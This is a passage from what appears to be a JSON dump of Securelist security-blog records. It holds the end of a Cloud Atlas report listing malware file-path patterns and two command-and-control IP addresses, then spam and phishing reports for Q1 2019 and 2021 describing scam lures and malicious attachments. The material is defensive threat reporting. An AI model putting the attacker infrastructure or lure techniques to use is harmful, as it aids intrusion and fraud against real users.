\"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "cvss3": {}, "published": "2019-08-12T10:00:58", "type": "securelist", "title": "Recent Cloud Atlas activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15084744/spam_report_q1_2019-990x400.jpg)\n\n## Quarterly highlights\n\n### Valentine's Day\n\nAs per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)\n\nBut most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)\n\n### New Apple products\n\nLate March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.\n\n_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)\n\n_Fake Apple ID login pages_\n\nScammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)\n\n### Fake technical support\n\nFake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)\n\n_Fake \"Kaspersky Lab support service\" accounts_\n\nAll these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.\n\n### New Instagram \"features\"\n\nLast year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full \u2014 not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.\n\nCybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)\n\nAs usual in such schemes, the \"buyer\" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)\n\n### Mailshot phishing\n\nIn Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)\n\n### Financial spam through the ACH system\n\nIn Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)\n\n### \"Dream job\" offers from spammers \n\nIn Q3, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing \"dream job\" offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the \"cloud service,\" the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)\n\n### Ransomware and cryptocurrency\n\nAs we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of \"sextortion\" \u2014 a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)\n\nIn Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.\n\nThe fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"employee\" happened to know that the victim was a well-off individual with a reputation to protect \u2014 for which a payment of 10,000 dollars in bitcoin was demanded.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)\n\nPlaying on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.\n\n### Malicious attacks on the corporate sector\n\nIn Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)\n\nWe also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)\n\n### Attacks on the banking sector\n\nBanks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message \u2014 for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. The email itself stated that the bank had introduced some new security features that required an update of the account details to use.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)\n\nThe link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)\n\nIn Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.\n\n_Proportion of spam in Runet mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)\n\nPeak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)\n\nAs is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).\n\n### Spam email size\n\n_Spam email size, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)\n\nIn Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2\u20135 KB messages fell to 8.27% (down 3.15 p.p.). 10\u201320 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20\u201350 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).\n\n### Malicious attachments: malware families\n\n_TOP 10 malicious families in mail traffic, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)\n\nIn Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.\n\n### Countries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)\n\nFirst place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.\n\n## Statistics: phishing\n\nIn Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites. **12.11%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nIn Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.\n\n_Geography of phishing attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)\n\nIn second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.\n\n**Country** | **%*** \n---|--- \nBrazil | 21.66 \nAustralia | 17.20 \nSpain | 16.96 \nPortugal | 16.81 \nVenezuela | 16.72 \nGreece | 15.86 \nAlbania | 15.11 \nEcuador | 14.99 \nRwanda | 14.89 \nGeorgia | 14.76 \n \n*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, the banking sector remains in first place by number of attacks \u2014 the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 25.78%.\n\n_Distribution of organizations subjected to phishing attacks by category, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)\n\nSecond place went to global Internet portals (19.82%), and payment systems \u2014 another category that includes financial institutions \u2014 finished third (17.33%).\n\n## Conclusion\n\nIn Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.\n\nAs previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away \u2014 on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.\n\nOn top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.", "cvss3": {}, "published": "2019-05-15T10:00:23", "type": "securelist", "title": "Spam and phishing in Q1 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-05-15T10:00:23", "id": "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "href": "https://securelist.com/spam-and-phishing-in-q1-2019/90795/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-14T15:27:23", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08143053/sl-spam-phishing-mail-abstract-990x400.jpg)\n\n## Figures of the year\n\nIn 2021:\n\n * 45.56% of e-mails were spam\n * 24.77% of spam was sent from Russia with another 14.12% from Germany\n * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails\n * The most common malware family found in attachments were Agensla Trojans\n * Our Anti-Phishing system blocked 253 365 212 phishing links\n * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers\n\n## Trends of the year\n\n### How to make an unprofitable investment with no return\n\nThe subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their "investment projects" look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That's how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they'd invite the "customer" to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01-727x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)\n\nSimilar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02-1024x402.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)\n\nAnother trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. In order to make sure the investors didn't think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be "processed".\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)\n\n### Films and events "streamed" on fake sites: not seeing is believing!\n\nOnline streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim's trust. They used official advertisements and provided a synopsis of the film on the website.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04-941x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)\n\nHowever, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content, the only difference was visitors might not be able to watch anything without registering. Either way the registration was no longer free. The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05-1024x364.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)\n\n### A special offer from cybercriminals: try hand at spamming\n\nMore and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, "prize winners" are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small "commission fee" to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06-1024x876.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)\n\n### Hurry up and lose your account: phishing in the corporate sector\n\nThe main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient's attention. The attackers' main objective was to trick the victim into following the link to a phishing page for entering login details. That's why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07-733x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)\n\nThe fake notification would often concern some undelivered messages. They needed to be accessed via some sort of "email Portal" or another similar resource.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08-1024x437.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)\n\nAnother noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient's guard and prompt them to enter the username and password for their corporate account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09-1024x373.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)\n\n### COVID-19\n\n#### Scams\n\nThe subject of COVID-19 which dominated newsfeeds throughout the entire year was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim's bank card details.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10-1024x506.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)\n\nThe sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There's no guarantee that the code they're selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11-1024x459.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)\n\n#### The corporate sector\n\nCOVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to "confirm" their e-mail address by logging in to their account on the scam website.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12-1024x170.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)\n\nAnother malicious mailshot utilized e-mails with an attached HTML file called "Covid Test Result". Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13-1024x686.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)\n\nThe "important message about vaccination" which supposedly lay unread in a recipient's inbox also contained a link to a page belonging to attackers requesting corporate account details.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)\n\nAnother type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work accompanied by the need to take urgent action and read a "2 months salary receipt" were intended to make the recipient open the attachment with the malicious object as quickly as possible.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15-1024x136.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)\n\n#### COVID-19 vaccination\n\nWhile authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people's desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country's National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16-1024x770.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)\n\nIn both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details. If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17-749x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)\n\nAnother way to gain access to users' personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18-1024x453.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)\n\nThe scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a "prize" page but told to pay a small necessary "commission fee" in order to receive it. The scammers received the money, but the victim got nothing as a result.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19-1024x455.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)\n\nWe also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim's system.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nOn average, 45.56% of global mail traffic was spam in 2021. The figure fluctuated over the course of the year.\n\n_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_\n\nWe observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.\n\n### Source of spam by country or region\n\nLike in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), who've also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China's rose 2.52 p.p. compared to 2020.\n\n_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_\n\nThe Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as 2020, Japan (2,36%) and Poland (1.66%). In total, over three quarters of the world's spam was sent from these ten countries.\n\n### Malicious mail attachments\n\n_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_\n\nIn 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.\n\n#### Malware families\n\nThe attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same amount of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (3.93%) family, which create malicious tasks in Windows Task Scheduler.\n\n_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_\n\nThe fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any 